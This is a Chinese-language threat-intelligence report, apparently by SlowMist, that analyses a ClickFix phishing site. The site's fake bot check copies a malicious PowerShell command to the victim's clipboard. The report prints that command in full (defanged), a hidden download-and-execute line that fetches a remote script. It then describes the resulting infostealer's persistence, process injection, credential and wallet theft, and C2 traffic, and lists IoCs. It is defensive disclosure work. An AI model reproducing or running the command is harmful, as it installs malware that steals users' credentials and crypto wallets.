值得信赖的区块链资讯!
威胁情报:Clickfix 钓鱼攻击
来源:慢雾科技
作者:Joker&Thinking
编辑:KrsMt.&Liz
背景
近日,MistEye 安全监控系统发现一个钓鱼网站,该网站采用 Clickfix 钓鱼攻击技术。这类钓鱼网站主要通过模仿正规网站常用的机器人校验功能,诱导受害者执行恶意命令,达到下载恶意软件的目的。获取到相关恶意样本信息后,慢雾安全团队立即展开分析。
分析过程
访问该钓鱼网站时,会显示正规网站常用的机器人校验功能。
当受害者点击了 checkbox 开始校验后,该钓鱼网站会将恶意命令自动复制到剪贴板中,并且引导受害者按下特定的按键,实现恶意软件的下载与执行。
在这段前端代码中,程序会监听来自 iframe 或父/子窗口的 postMessage 消息。当接收到“turnstileSuccess”消息时,就会调用 copyTextSilently () 方法。
在 index_1.html 页面的前端代码中,做了 checkbox 监听,当受害者正常触发该 checkbox 后,会向父页面发送“turnstileSuccess”消息。
复制恶意命令到剪贴板
在 copyTextSilently() 方法中,首先会去判断是否满足调用 Clipboard API 条件。
如果条件满足,直接调用 Clipboard#writeText() 方法,写入命令到剪贴板中。
如果条件不满足,则先创建一个 <textarea> 元素,把要复制的命令放到 <textarea> 里,然后隐藏元素并添加到页面后,使用 execCommand() 方法复制命令,最后移除元素。
在前端代码中可以看到,command_win 命令是从全局作用域的 window 对象中获取的。根据注释可以知道,window.command_win 可能是在外部脚本 assets/command.js 中定义的。
查看 command.js 文件可知,该文件中确实定义了全局变量 window.command_win,而该命令的主要功能是从远程服务器下载恶意脚本,并通过 PowerShell 在本地隐藏执行。
powershell -w h -c "$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';$p='$env:USERPROFILE\Music\d.ps1';(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"
从前端代码中可以看到,点击 VERIFY 按钮同样会触发 copyTextSilently () 方法,但受浏览器安全限制,受害者在点击 VERIFY 按钮后,还需再次点击网页页面,才能完成恶意命令的复制操作。
分析恶意脚本
$mmASoSdDL 是一个数组,先通过 join 方法拼接为字符串,再对这段 Base64 编码的字符串进行解码,将得到的字节数组转换为 UTF-8 字符串,最后把该 JSON 字符串转换为 PowerShell 对象。
解码后的部分内容如下:
创建隐藏目录
该恶意脚本会先判断目标目录是否存在,若不存在则创建该目录,并将其属性设置为“Hidden”和“System”。
写入恶意文件
该恶意脚本会遍历 JSON 中的 files 数组,根据此前创建的隐藏目录与数组中的 name 字段拼接出完整文件路径,随后将经过 Base64 编码的 b64 字段解码为原始二进制数据,并写入至该完整路径所指向的文件中。
准备自启动
该恶意脚本会在当前受害者的启动文件夹(Startup) 中创建一个名为 trntl.lnk 的快捷方式。此快捷方式指向恶意文件 trntl.exe,并且会设置系统图标进行伪装。快捷方式创建完成后 trntl.exe 便会在受害者登录或开机时自动执行。
延迟执行
该恶意脚本会生成一个随机名称的临时.cmd 文件,在该文件中设置通过 rundll32 调用 ShellExec_RunDLL 来启动 exe。脚本会等待 60 秒,之后通过 cmd.exe/c 执行这个 .cmd 文件,执行完成后再将该 .cmd 文件删除以清理痕迹。
恶意脚本代码
以下是恶意脚本中的主要代码(原代码为连续文本,为增强可读性,已手动换行处理)。
动态分析
将恶意 exe 文件上传至 VirusTotal 沙箱后,从分析结果可知,该文件已被标记为恶意文件。
(https://www.virustotal.com/gui/file/cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039/detection)
进程注入
从 VirusTotal 沙箱的分析结果来看,恶意程序把代码注入到合法进程(regasm.exe) 的内存空间,然后修改目标进程的执行流,让 regasm.exe 执行恶意代码。
敏感信息收集
从 VirusTotal 沙箱的分析结果来看,该恶意程序展现出典型的信息窃取行为,具体表现为对多个浏览器的敏感数据进行搜索,涉及 Chrome、Chromium、Opera 等。其目的可能是为了窃取浏览器中存储的 cookies、钱包、保存的密码等敏感信息;搜索邮件客户端(如 Thunderbird、Windows Mail)的敏感数据,可能是为了获取邮箱账号和邮件内容等敏感信息;搜索加密货币钱包位置,可能是为了窃取私钥、钱包数据等信息以便盗币;搜索 FTP 工具敏感数据,可能是为了获取 FTP 登录凭据等敏感信息。
键盘记录
从 VirusTotal 沙箱的分析结果来看,该恶意程序具备键盘记录功能,能够实时记录受害者的输入内容,其中可能包括账号、密码等敏感信息。
网络通信
从 VirusTotal 沙箱的分析结果来看,该恶意程序先通过 Pastebin 获得 C2 配置,再和 IP 地址 217[.]12[.]204[.]47[:]9000/443 建立通信,可能会上传窃取的敏感数据或接收恶意指令。
访问 https[:]//pastebin[.]com/raw/rzARed3W 返回恶意 IP 地址信息。
在 VirusTotal 平台中,该 IP 和 URL 都已经被标记为恶意地址,且 IP 地址显示为希腊。
(https://www.virustotal.com/gui/ip-address/217.12.204.47)
(https://www.virustotal.com/gui/url/225eceb2f02ba20308d77ac250e85e43fa927b4d51edb5aa3290679fe17ee72d)
总结
需要注意的是,这类钓鱼网站的攻击往往结合社会工程学手段来实现 —— 通过诱导用户执行某些恶意命令,达成下载恶意软件的目的。用户在毫无防备的情况下执行此类命令,可能导致钱包私钥等敏感信息被盗取。
慢雾安全团队在此建议开发者与用户提高对陌生命令的警惕性,若确实需要进行运行调试,务必在独立且无敏感数据的设备环境中操作。
IoCs
IPs
217[.]12[.]204[.]47
SHA256
-
4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 —— aTu.lim
-
cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 —— trntl.exe
-
60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 —— command.js
Urls
-
https[:]//pastebin[.]com:443/raw/rzARed3W
-
217[.]12[.]204[.]47:443
-
217[.]12[.]204[.]47:9000
-
http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
-
http[:]//electri[.]billregulator[.]com/aTu.lim
比推快讯
更多 >>- Genius 将暂停动态积分发放,拟转向追溯积分机制
- 白宫加密委员会负责人:比特币战略储备推进受制于“技术性法律条款”
- 比特币跌破 95,000 美元,24 小时跌幅 0.49%
- Algorand 基金会宣布重返美国市场,并组建新董事会
- BSC Meme 币哭哭马日内涨超 31%,市值短时突破 500 万美元
- 特朗普因格陵兰岛向欧洲 8 国加征关税
- 数据:若 BTC 突破 99,448 美元,主流 CEX 累计空单清算强度将达 7.83 亿美元
- 数据:1.37 万枚 TON 从 Kiln 转出,经中转后流入 TON
- 远古巨鲸 9 小时前再度卖出 500 枚 BTC,仍持有约 2500 枚 BTC
- Coinbase CEO 回应白宫态度传闻:白宫态度建设性,正与银行推进收益方案
- 代币化资产或于 2026 年增至 4000 亿美元规模,银行与资管机构加速入场
- Coinbase CEO 否认白宫将撤回对加密货币市场结构法案支持的传言
- 数据:50 万枚 LINK 转入 Coinbase,价值约 686 万美元
- Cyber Capital 创始人:Bitcoin 可能在 7 至 11 年内崩盘
- 数据:2000 万枚 TRX 从 WhiteBIT 转出,价值约 632 万美元
- 数据:过去 24 小时全网爆仓 7,777.37 万美元,多单爆仓 3,178.78 万美元,空单爆仓 4,598.59 万美元
- 数据:24.99 枚 WBTC 从 HitBTC 转入 Binance,价值约 238 万美元
- 数据:460 万 XUSD 从 Binance 转出,价值约 460 万美元
- 数据:106 枚 BTC 从 Coinbase 转出,价值约 1013 万美元
- X 产品负责人回应质疑:平台使用的 API 将几乎可以实时处理链上铸造的任何内容
- Nansen CEO 抨击 Coinbase Advanced 费率结构称其“简直离谱”
- 数据:238.74 枚 BTC 从匿名地址转出,经中转后流入 Duelbits
- James Wynn:以太坊看起来相当强势,Q1 将是偏多行情
- Steak'n Shake 购入 1000 万美元比特币,推进企业级 BTC 金库战略
- a16z 加密基金管理合伙人呼吁加速推进 CLARITY 法案:加密开发者急需明确规则
- Trust Wallet:不会向用户索要助记词或私钥
- dYdX 年度生态报告,累计交易额超 1.55 万亿美元,回购规模扩大至净收入 75%
- 数据:1.7 万枚 SOL 从 KuCoin 转出,价值约 244 万美元
- Defiance 决定关闭纳斯达克上市的以太坊 ETF
- 数据:ETH 跌破 3300 美元
- 特朗普释放美联储人事信号,比特币涨势遇扰,市场重新评估 2026 年降息预期
- 分析师:OG 持有者抛压减弱,比特币或向 10.7 万美元目标价发起冲击
- Token Terminal:非 USDC/USDT 稳定币占 Solana 总供应量比重升至 20%
- 历史上的今天:17 年前中本聪发布比特币 v0.1 Alpha 版
- 传统巨头与加密公司正面交锋,稳定币或重塑 9000 亿美元跨境汇款市场
- 观点:美参议院加密市场结构法案延期,监管不确定性升温,相关资产承压
- Sam Altman 回应广告计划隐私质疑:不受付费行为影响且内容对广告商不可见
- 贝莱德近 3 日提取 12,658 枚 BTC 和 9,515 枚 ETH,总价值达 12.4 亿美元
- Eugene:大部分山寨币多单已退出,核心比特币多单仍然持有
- Metaplanet CEO:企业是否持有 BTC 关键不在信仰而在管理层决心
- 交易员 Eugene:已基本退出山寨币多头仓位,相关投资标的表现未达预期
- 比特币提币延续,过去 24 小时 CEX 净流出 347.51 枚 BTC
- Castle Island Ventures 联创:支持 X 撤销 InfoFi 应用 API 访问权限,Kaito 等激励性发文平台产生大量低质内容
- 数据:过去 1 小时 Binance 净流出 4,376.31 万 USDT
- Tom Lee:以太坊或在 2026 年迎来高光时刻,ETH 上看 1.2 万美元
- 数据:监测到 3,400 万 USDT 转出 Binance
- SOL 财库公司 Sharps Technology 与 SOL Markets 达成 90 天股票锁仓协议
- ETH 突破 3300 USDT,24H 跌幅收窄至 0.35%
- Galaxy 研究主管:稳定币收益是美国加密结构法案谈判关键症结,下次听证会或于 1 月最后一周启动
- 观点:国内可重新审视加密货币领域创新与监管平衡,完善内部体系并加强国际监管合作
比推专栏
更多 >>观点
比推热门文章
- Genius 将暂停动态积分发放,拟转向追溯积分机制
- 白宫加密委员会负责人:比特币战略储备推进受制于“技术性法律条款”
- 比特币跌破 95,000 美元,24 小时跌幅 0.49%
- Algorand 基金会宣布重返美国市场,并组建新董事会
- BSC Meme 币哭哭马日内涨超 31%,市值短时突破 500 万美元
- 特朗普因格陵兰岛向欧洲 8 国加征关税
- 数据:若 BTC 突破 99,448 美元,主流 CEX 累计空单清算强度将达 7.83 亿美元
- 数据:1.37 万枚 TON 从 Kiln 转出,经中转后流入 TON
- 远古巨鲸 9 小时前再度卖出 500 枚 BTC,仍持有约 2500 枚 BTC
- Coinbase CEO 回应白宫态度传闻:白宫态度建设性,正与银行推进收益方案
比推 APP



